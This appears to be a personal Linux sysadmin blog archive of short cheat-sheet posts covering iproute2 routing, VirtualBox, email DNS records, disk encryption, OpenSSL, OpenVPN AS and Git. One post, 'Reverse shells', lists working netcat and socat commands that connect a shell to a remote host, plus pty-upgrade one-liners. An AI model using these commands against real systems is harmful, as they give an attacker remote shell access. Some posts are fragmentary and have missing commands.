iproute2
November 27, 2016 — 14:55
Author: silver  Category: network  Comments: Off

Documentation

Linux Advanced Routing & TC: http://lartc.org/howto/index.html

Basic commands

I guess ifconfig is deprecated now…

Help:

ip a help

( a=address l=link r=route )

Show:

ip a show eth0

ip l show eth0

ip r get 8.8.8.8

( use ip -4 or -6 for ipv4/6 )

Change:

ip l set dev eth0 up

ip a add 192.168.1.2/24 dev eth0

.

Two Default Gateways

Useful to setup for hosts on multiple subnets/networks.

Howto’s:

Instructions

Add table:

echo -e "10\trt2" >> /etc/iproute2/rt_tables

Add route/rule:

ip route add 1.2.3.0/20 dev eth1 src 1.2.3.172 table rt2
ip route add default via 1.2.3.1 dev eth1 table rt2

ip rule add from 1.2.3.172/32 table rt2
ip rule add to 1.2.3.172/32 table rt2

ip rule add from 1.2.3.173/32 table rt2
ip rule add to 1.2.3.173/32 table rt2

ip route flush cache
ip route list table rt2
ip route show
ip rule show

Testing:

ping -I 1.2.3.172 8.8.8.8

Making it permanent

debian:

/etc/interfaces
/etc/network/interfaces.d/eth1

post-up ip route add 1.2.3.0/20 dev eth1 src 1.2.3.174 table rt2
post-up ip route add default via 1.2.3.1 dev eth1 table rt2
post-up ip rule add from 1.2.3.174/32 table rt2
post-up ip rule add to 1.2.3.174/32 table rt2

/etc/network/interfaces.d/eth1:0

post-up ip rule add from 1.2.3.176/32 table rt2
post-up ip rule add to 1.2.3.176/32 table rt2

redhat:

echo "1.2.3.0/20 dev eth1 src 1.2.3.172 table rt2" >> /etc/sysconfig/network-scripts/route-eth1
echo "default via 1.2.3.1 dev eth1 table rt2" >> /etc/sysconfig/network-scripts/route-eth1

echo "from 1.2.3.172/32 table rt2" >> /etc/sysconfig/network-scripts/rule-eth1
echo "to 1.2.3.172/32 table rt2" >> /etc/sysconfig/network-scripts/rule-eth1
echo "from 1.2.3.173/32 table rt2" >> /etc/sysconfig/network-scripts/rule-eth1
echo "to 1.2.3.173/32 table rt2" >> /etc/sysconfig/network-scripts/rule-eth

VirtualBox
November 27, 2016 — 2:51
Author: silver  Category: virtualization  Comments: Off

Tips & tricks

Guest clipboard:

/usr/bin/VBoxClient
/usr/bin/VBoxClient --clipboard
/usr/bin/VBoxClient --draganddrop

Resize VDI:

  • SIZE_IN_MB would be 30000 for 30GB
  • VBoxManage list hdds

Windows Host:

C:\Program Files\Oracle\VirtualBox\VboxManage.exe modifyhd YOUR_HARD_DISK.vdi --resize SIZE_IN_MB

Mac Host:

# /Applications/VirtualBox.app/Contents/MacOS/VBoxManage modifyhd YOUR_HARD_DISK.vdi --resize SIZE_IN_MB

Linux Host:

# VBoxManage modifyhd YOUR_HARD_DISK.vdi --resize SIZE_IN_MB

Linux Guest: # resize2fs /dev/sda1

Compact disk

Windows Guest:
– Cleanup
– Defrag
– sdelete -z, sdelete -c
– shutdown
– VboxManage modifyhd –compact disk.vdi

Convert disk:

/usr/bin/VBoxClient --displayVBoxManage internalcommands converttoraw file.vdi file.raw
VBoxManage clonehd hdd.vdi hdd.img --format raw

convertfromraw
  [--format VDI|VMDK|VHD]
  [--variant Standard,Fixed,Split2G,Stream,ESX]
  [--uuid ]

convertfromraw stdin
  [--format VDI|VMDK|VHD]
  [--variant Standard,Fixed,Split2G,Stream,ESX]
  [--uuid ]

clonehd <uuid|inputfile> <uuid|outputfile>
  [--format VDI|VMDK|VHD|RAW|]
  [--variant Standard,Fixed,Split2G,Stream,ESX]
  [--existing]

Autostop – Linux Host:

VBoxManage modifyvm VM [--autostop-type disabled|savestate|poweroff|acpishutdown]
VBoxManage modifyvm VM --autostop-type acpishutdown

Autostart init script:

From: https://forums.virtualbox.org/viewtopic.php?f=7&t=65194

Re: Autostart VM on debian 7.7 virtualbox 4.3.20

Post by lnunes_pt ยป 19. Dec 2014, 02:40
Hi PavloM,

The answer to the first question is, NO, you need not login to host. But also, NO, you need not reboot host to test VMs starts.
The manual section 9.23.1 is not complete. Don’t use vbox.cfg for the configuration file name, otherwise setproperty autostartdbpath will lead to command syntax issues later.

Just to be sure you know, the VirtualBox autostart service init script is specially used in cases where you have many users on the host and want to control who can autostart VMs upon boot.
If you’re the only user on the host its alo just simpler start any headless VM from /etc/rc.local.

Edit /etc/default/virtualbox

    VBOXAUTOSTART_DB=/etc/vbox
    VBOXAUTOSTART_CONFIG=/etc/vbox/vboxautostart.cfg

Edit vboxautostart.cfg using Bob example how to deny all and allow bob:

    default_policy = deny
    bob = {
        allow = true
        startup_delay = 10
    }

Create the vboxautostart.cfg file. Add vboxusers group to /etc/vbox and sticky bit.

    # chgrp vboxusers /etc/vbox
    # chmod 1775 /etc/vbox

Add vboxusers group to all users (of course).

Then Execute once as users:

    $ VBoxManage setproperty autostartdbpath /etc/vbox

And for every VM to start, then you find under /etc/vbox, user.start file.
But also how it will stop, then you find under /etc/vbox, user.stop file.

    $ VBoxManage modifyvm  --autostart-enabled on
    $ VBoxManage modifyvm  --autostop-type acpishutdown

Then test START and STOP as root without need of host reboot.

    # /etc/init.d/vboxautostart-service start

Logon to the VM and test the shutdown next. You should get logged off for system shutdown:

    # /etc/init.d/vboxautostart-service stop

Note The Virtualbox autostart script should exist /etc/init.d/vboxautostart-service (it can be downloaded from Source Code Repository: trunk -> src -> VBox -> Installer -> linux -> vboxautostart-service.sh)

Autostart delay:

VBoxManage modifyvm VMNAME --autostart-delay 10

Autostop – Windows Host:

Display

VBoxManage controlvm VMNAME setvideomodehint 1680 975 16

(or 16/24/32)

Headless

VBoxManage startvm "VM" --type headless

Shares

Host: Share Folder (e.g. “foo”), Full Access (write)
Guest: # mkdir /mnt/foo; mount -t vboxsf ~/foo /mnt/foo

Mount VDI (NTFS)

Guest:

# modprobe nbd max_part=16
# qemu-nbd -c /dev/nbd0 image.vdi
# mkdir /mnt/image; mount /dev/nbd0p2 /mnt/image

To remove:
# qemu-nbd -d /dev/nbd0

SPF, DKIM and DMARC
November 26, 2016 — 23:39
Author: silver  Category: other  Comments: Off

Prevent email-spoofing, phishing and spam by setting these DNS TXT Records.

Send Policy Framework (SPF):

domain.com. IN TXT "v=spf1 a mx include:domain.com ~all"

DomainKeys Identified Mail (DKIM):

Generate public/private key with opendkim-tools.

$ opendkim-genkey --bits=2048 --domain=domain.com --verbose

Use the private key for your mailserver, eg postfix.
Use public key for the TXT record (“1234+ABc/dEF"):

_domainkey.domain.com. IN TXT "o=-"
default._domainkey.domain.com. IN TXT "v=DKIM1; g=*; k=rsa; p=1234+ABc/dEF;"

Domain-based Message Authentication, Reporting and Conformance (DMARC):

_dmarc.domain.com IN TXT "v=DMARC1; p=reject; rua=mailto:[email protected]; ruf=mailto:[email protected]"

Testing:

gnome-keyring
November 26, 2016 — 17:52
Author: silver  Category: linux  Comments: Off

Quickfix issues

Restart:

gnome-keyring-daemon -r -d

If that doesn’t suffice, this extra steps might help:

pgrep -f gnome-keyring-daemon
rm -rf ~/.cache/keyring-*
setsid /usr/bin/gnome-keyring-daemon /dev/null 2>&1
ln -s ~/.cache/keyring-* $GNOME_KEYRING_CONTROLA
/usr/bin/gnome-keyring-daemon --start --components=pkcs11
/usr/bin/gnome-keyring-daemon --start --components=gpg
/usr/bin/gnome-keyring-daemon --start --components=ssh

find ~/.cache/ -maxdepth 1 -type l -name 'keyring-*' -delete
Sendmail with attachment
November 26, 2016 — 17:48
Author: silver  Category: linux  Comments: Off

Oneliner to send email with attachment using sendmail:

$S Subject
$B Body
$A Attachment
Display man pages as text
November 26, 2016 — 15:51
Author: silver  Category: linux  Comments: Off
man openssl | cat
man -P cat openssl
groff -t -e -mandoc -Tascii manpage.1 | col -bx > manpage.txt
Windows Disk Encryption
November 26, 2016 — 14:35
Author: silver  Category: encryption windows  Comments: Off

Before I chose to replace TrueCrypt with VeraCrypt I was looking for/comparing alternatives.
I also use Bitlocker and EFS that are included with Windows.

Except for DiskCryptor and LibreCrypt all these programs also run on Linux.

More here: http://www.surfsafely.com/truecrypt-alternatives

Linux Disk Encryption
November 26, 2016 — 13:04
Author: silver  Category: encryption linux  Comments: Off

Linux Disk Encrption using Device Mapper, cryptsetup frontend and Linux Unified Key Setup LUKS (on disk format).

Setup:

cryptsetup -y -v luksFormat /dev/sdb1
cryptsetup luksOpen /dev/sdb1 foo
cryptsetup status foo -v

Test:

cryptsetup --test-passphrase open /dev/sdb1 # (non-LUKS)
cryptsetup luksOpen --test-passphrase /dev/sdb1
cryptsetup isLuks /dev/sdb1 && echo IMaLUKS
cryptsetup luksDump /dev/sdb1

Change:

(asks current passphase first)

cryptsetup -y luksChangeKey <target device> -S <target key slot number>
cryptsetup -y luksChangeKey /dev/sdb1 -S 1

Or use gui gnome-disks:

  • Disks (gnome-disks)
  • 1.0TB Hard Disk
  • Volumes: “Partition 1 1.0 TB LUKS”
  • Cogs/wheels

Add/remove key:

sudo cryptsetup -y luksAddKey ENCRYPTED_PARTITION
sudo cryptsetup luksRemoveKey ENCRYPTED_PARTITION

Various:

dmsetup ls --tree
lsblk
lsblk --fs
Reverse shells
November 26, 2016 — 12:45
Author: silver  Category: linux  Comments: Off

USING NETCAT:

SERVER/LISTEN:

netcat -lvp 9999

CLIENT:

netcat -e /bin/sh host.name 9999

NICER SHELL:

python -c 'import pty; pty.spawn("/bin/bash")'
( sleep 1; echo 'bla' ) | python -c "import pty; pty.spawn(['/usr/bin/sudo','-S','whoami']);"

 

 

USING SOCAT:

SERVER/LISTEN:

socat file:`tty`,raw,echo=0 tcp-listen:8888

CLIENT:

socat tcp-connect:host.name:8888 exec:'bash -li',pty,stderr,setsid,sigint,sane

CLIENT:

socat tcp:host.name:8888 exec:"bash -li",pty,stderr,setsid,sigint,sane

socat TCP-LISTEN:8888,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
socat FILE:`tty`,raw,echo=0 TCP:1.2.3.4:8888

export STY=
stty rows 40 cols 130
stty rows 40 cols 230
EncFS
November 25, 2016 — 22:02
Author: silver  Category: encryption linux  Comments: Off

Install on CentOS6:

Required packages:

yum install -y fuse-2.8.3-5.el6.x86_64 
yum install -y fuse-libs.x86_64
yum install -y fuse-devel.x86_64

usermod -a -G fuse <your_user>

yum install -y git
yum install -y cmake

yum install -y boost-serialization.x86_64
yum install -y openssl-devel.x86_64
yum install -y rlog-devel.x86_64
yum install -y tinyxml2-devel.x86_64 
yum install -y gettext-devel.x86_64

yum install -y centos-release-scl
yum install -y devtoolset-3-gcc-c++ -y

Compile:

scl enable devtoolset-3 bash

git clone https://github.com/vgough/encfs

cd encfs
mkdir build
cd build
cmake ..
make
make test
make install
make package

mkdir ~/test
mkdir ~/Private

Test:

encfs ~/Private ~/test
echo testing > ~/test/testfile

fusermount -u ~/test
OpenVPN AS
November 25, 2016 — 21:31
Author: silver  Category: encryption linux  Comments: Off

OpenVPN Access Server is quite easy and fast to setup and includes a web gui.

Download:

Configuration:

Clickety click in the gui, plus some hardening:

Server:

Client:

auth SHA512
cipher AES-256-CBC

Connect with SSH + SOCKS Proxy + OTP:

$ ssh -D 1 to remote host

Ban user:

Ban a user from logging into the VPN or Web server
(doesn’t affect a user who is already logged in — for this, use DisconnectUser below):

/usr/local/openvpn_as/scripts/sacli --user <USER> --key prop_deny --value true UserPropPut

Re-admit a user who was previously banned:

/usr/local/openvpn_as/scripts/sacli --user <USER> --key prop_deny --value false UserPropPut

Disconnect a user:

/usr/local/openvpn_as/scripts//sacli --user <USER> --key prop_deny --value true UserPropPut

Set client cert keysize:

/usr/local/openvpn_as/scripts/sa --keysize=4096 Init

Generating init scripts:

/usr/local/openvpn_as/scripts/openvpnas_gen_init [--auto]

Google Authenticator:

Unlock a secret:

./sacli -u <USER> --lock 0 GoogleAuthLock

Lock a secret:

./sacli -u <USER> --lock 1 GoogleAuthLock

Generate a new, unlocked secret:

./sacli -u <USER> --lock 0 GoogleAuthRegen

Generate a new, locked secret:

./sacli -u <USER> --lock 1 GoogleAuthRegen

Enable Google Authenticator for all accounts:

./sacli --key vpn.server.google_auth.enable --value true ConfigPut

Enable for 1 user:

./sacli --user <USER_OR_GROUP> --key prop_google_auth --value true UserPropPut

Disable:

./sacli --key vpn.server.google_auth.enable --value false ConfigPut

Disable for 1 user:

./sacli --user <USER_OR_GROUP> --key prop_google_auth --value false UserPropPut

Revoke and reissue secret:

./sacli -u <USER> GoogleAuthRegen

Retrieve current user properties:

./confdba -us -p

Port sharing:

Advanced VPN Settings: port-share 127.0.0.1 10443
(tcp mode only)

OpenSSL
November 25, 2016 — 21:26
Author: silver  Category: encryption linux  Comments: Off

List deleted open files (after update):

lsof | grep -i libssl | grep DEL | awk '{print $1}' | sort | uniq

Generate CSR, self signed cert:

openssl genrsa -out rootCA.key 2048
openssl genrsa -des3 -out rootCA.key 2048
openssl req -x509 -new -nodes -key rootCA.key -sha256 -days 3650 -out rootCA.pem
openssl x509 -req -in server.csr -CA rootCA.pem -CAkey rootCA.key -CAcreateserial -out server.crt -days 3650 -sha256

View CSR

openssl req -in file.csr -noout -text

View cert fingerprint

openssl x509 -fingerprint -noout -in file.crt -sha256
openssl x509 -fingerprint -noout -in file.crt -sha1
openssl x509 -fingerprint -noout -in file.crt -md5

View ciphers:

openssl ciphers -v 'TLSv1' | sort

Test ciphers:

openssl s_client -connect google.com:443 -cipher "EDH"
openssl s_client -connect google.com:443 -cipher "RC4"
openssl s_client -connect google.com:443 -tls1
openssl s_client -connect google.com:443 -tls1_1
openssl s_client -connect google.com:443 -tls1_2

echo -n | openssl s_client -connect google.com:443
nmap --script ssl-enum-ciphers -p 443

Get fingerprint from live SSL cert (IRC):

echo | openssl s_client -connect efnet.port80.se:6697 |& openssl x509 -fingerprint -noout -sha256
echo | gnutls-cli -p 6697 irc.underworld.no --print-cert | sed -n '/-----BEGIN CERT/,/-----END CERT/p' |& openssl x509 -fingerprint -noout -sha256

Show fingerprint:

openssl x509 -in cert.pem -fingerprint -noout

To change the password of your private key:

openssl rsa -des3 -in ca.key -out ca_new.key
mv ca_new.key ca.key

Verifying that a Private Key Matches a Certificate

$ openssl x509 -noout -modulus -in server.pem | openssl md5 ;\
openssl rsa -noout -modulus -in server.key | openssl md5

Get the MD5 fingerprint of a certificate using OpenSSL

openssl dgst -md5 certificate.der

Get the MD5 fingerprint of a CSR using OpenSSL

openssl dgst -md5 csr.der

Debug SMTP/STARTTLS:

openssl s_client -debug -starttls smtp -crlf -connect localhost:25
File Encryption
November 25, 2016 — 18:44
Author: silver  Category: encryption linux  Comments: Off

All of these are FUSE based except for eCryptfs.

Comparison: https://nuetzlich.net/gocryptfs/comparison

 

CryFS
November 25, 2016 — 18:18
Author: silver  Category: encryption linux  Comments: Off

Download:
 
http://cryfs.org
https://github.com/cryfs/cryfs
 
Compile under CentOS 6:
 

yum install https://www.softwarecollections.org/repos/denisarnaud/boost157/epel-6-x86_64/noarch/denisarnaud-boost157-epel-6-x86_64-1-2.noarch.rpm
yum install -y boost157-devel.x86_64 boost157-static.x86_64 

scl enable devtoolset-3 bash
export BOOST_ROOT=/usr/include/boost157
export BOOST_LIBRARYDIR=/usr/lib64/boost157
mkdir cmake && cd cmake
cmake ..
make
sudo make install
Compile PuTTY under Cygwin
November 25, 2016 — 17:16
Author: silver  Category: windows  Comments: Off
  1. Download dev snapshot:
gpg --verify putty-src.zip.gpg putty-src.zip
grep $( sha512sum putty-src.zip ) sha512sums
  1. Run the compile.sh script below
#!/bin/sh

echo
echo "putty needs the following pkgs under cygwin64:"
echo "mingw64-x86_64-headers w32api w32api-headers"
echo
#export PERL5LIB=/usr/lib/perl5/5.22/CPAN
perl mkfiles.pl
sed -i.bak 's/^M//g' licence.h
make distclean
cd windows
make clean -f Makefile.mgw

make -j4 \
TOOLPATH="x86_64-w64-mingw32-" \
CFLAGS="-Wall -O2 -D_WINDOWS -DDEBUG -DWIN32S_COMPAT -D_NO_OLDNAMES -I.././ \
-I../charset/ -I../windows/ -I../unix/ \
-D_WIN32_IE=0x0500 \
-DWINVER=0x0500 -D_WIN32_WINDOWS=0x0410 -D_WIN32_WINNT=0x0500 \
-DNO_MANIFESTS" \
LDFLAGS="-s" \
RCFLAGS="--define WIN32=1 --define _WIN32=1 --define WINVER=0x0400 \
-I.././ -I../charset/ -I../windows/ -I../unix/" \
COMPAT="-DWINSOCK_TWO -DNO_MULTIMON" \
-f Makefile.mgw

It’s also possible to make with version variables:

make VER="-DSNAPSHOT=$(date '+%Y-%m-%d') -DSVN_REV='$(svnversion)' -DMODIFIED" TOOLPATH=i586-mingw32msvc- -f Makefile.cyg putty.exe
Serial console
November 25, 2016 — 17:14
Author: silver  Category: linux  Comments: Off

/etc/default/grub:

GRUB_CMDLINE_LINUX="video=off elevator=deadline console=tty0 console=ttyS0,115200"
GRUB_TERMINAL=serial
GRUB_SERIAL_COMMAND="serial --unit=0 --speed=115200 --stop=1"

/etc/inittab:

0:2345:respawn:/sbin/agetty -8 ttyS0 115200 vt100
Git
November 25, 2016 — 13:07
Author: silver  Category: linux  Comments: Off

Just a little cheatsheet… ;)

Start ssh-agent:

eval $( ssh-agent )
ssh-add /home/user/.ssh/id_ed25519_git
ssh -T [email protected]

Now you should be able to “git push”

New repository, using SSH:

git push origin master
git remote set-url origin [email protected]:username/repo.git
git remote add origin [email protected]:username/repo.git
git add .
git commit -m "First commit"

To change commit comment:

git commit --amend

 

 

Branches:

Clone the repository:

git clone

List all branches:

git branch -a

Checkout the branch that you want:

git checkout my-patch

Adding branches:

git branch
git checkout -b branchname
git push origin branchname
git remote add branchname [email protected]:username/repo.git
git commit .
git push branchname branchname

Switch between branches:

git checkout master
git checkout –

Remove remote (no really harmful):

git remote remove

More details about branches:

Update your branch when the original branch from official repository has been updated :

$ git fetch [name_of_your_remote]

Then you need to apply to merge changes, if your branch is derivated from develop you need to do :

$ git merge [name_of_your_remote]/develop

Delete a branch on your local filesystem :

$ git branch -d [name_of_your_new_branch]

To force the deletion of local branch on your filesystem :

$ git branch -D [name_of_your_new_branch]

Delete the branch on github :

$ git push origin :[name_of_your_new_branch]

 

 

Color:

git diff --color-words
git log --color-words
git show --color-words

 

Undo:

git checkout .  # revert your changes
git clean -fdxn # dry run
git clean -xdf  # delete untracked and ignored files (!!!)

 

SHA Hash:

git hash-object

(compare to:)
https://api.github.com/repos/user/repos/contents/file
https://api.github.com/repos/user/repos/bobs/hash

 

 

Removing sensitive data:

bfg --delete-files YOUR-FILE-WITH-SENSITIVE-DATA
bfg --replace-text passwords.txt

OR

git filter-branch --force --index-filter \
'git rm --cached --ignore-unmatch PATH-TO-YOUR-FILE-WITH-SENSITIVE-DATA' \
--prune-empty --tag-name-filter cat -- --all

(add to .gitignore)

git push origin --force --all
git push origin --force --tags
git for-each-ref --format='delete %(refname)' refs/original | git update-ref --stdin
git reflog expire --expire=now --all
git gc --prune=now

 

Working state:

Use git stash when you want to record the current state of the working directory and the index, but want to go back to a clean working directory

git stash
git stash list
git stash show
git stash show -p --color

(!) remove all states:

git stash clear

 

List remote:

git ls-remote $URL

 

Versioning:

short commit hash:

git rev-parse --short HEAD
git describe --tags --always --dirty=-dirty

 

Logs:

git log --graph --abbrev-commit --format=format:'%h - %s%d'
git log --oneline 
git log --pretty=oneline --abbrev-commit

git log --abbrev-commit
git log -1 --abbrev-commit
git log -1 --pretty=format:%h
WP-CLI
November 25, 2016 — 12:38
Author: silver  Category: web  Comments: Off

WP-CLI: A command line interface for WordPress

Download from: https://wp-cli.org/

Configuration:

  • /etc/sudoers.d/wp-cli:
  • crontab:


We use Matomo free and open source web analytics
We also use Jetpack WordPress.com Stats which honors DNT